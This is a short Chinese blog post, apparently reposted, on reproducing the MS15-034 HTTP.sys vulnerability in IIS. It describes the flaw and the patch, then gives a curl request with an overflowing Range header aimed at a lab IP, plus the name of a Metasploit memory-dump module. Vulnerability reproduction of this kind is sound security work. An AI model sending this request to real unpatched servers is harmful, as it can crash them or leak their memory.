码迷,mamicode.com
首页 > Web开发 > 详细

MS15-034漏洞复现、HTTP.SYS远程代码执行漏洞

时间:2019-10-17 11:54:48      阅读:734      评论:0      收藏:0      [点我收藏+]

标签:html   更新   str   img   cve   mic   服务器   src   serve   

#每次命令都百度去找命令,直接弄到博客方便些;

漏洞描述:

  在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。

修复建议:

  微软已发布补丁MS15-034,补丁下载地址:https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx 注:建议在修复前创建服务器快照,以免修复失败造成损失。

Referee:https://www.cnblogs.com/peterpan0707007/p/8529261.html

复现过程:

curl http://192.168.40.65 -H "Host: 192.168.40.65" -H "Range: bytes=0-18446744073709551615"

技术图片 

MSF模块

scanner/http/ms15_034_http_sys_memory_dump

技术图片

 

MS15-034漏洞复现、HTTP.SYS远程代码执行漏洞

标签:html   更新   str   img   cve   mic   服务器   src   serve   

原文地址:https://www.cnblogs.com/nul1/p/11691026.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!